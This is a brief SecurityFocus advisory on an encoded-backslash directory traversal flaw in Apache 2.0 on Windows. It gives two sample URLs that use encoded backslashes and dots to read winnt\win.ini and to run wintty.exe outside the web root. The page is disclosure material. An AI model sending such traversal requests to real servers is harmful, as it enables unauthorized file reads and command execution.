Apache 2.0 Encoded Backslash Directory Traversal Vulnerability

No exploit is required. The following sample requests have been provided by Auriemma Luigi <aluigi@pivx.com>:

http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO


 

Privacy Statement
Copyright 2010, SecurityFocus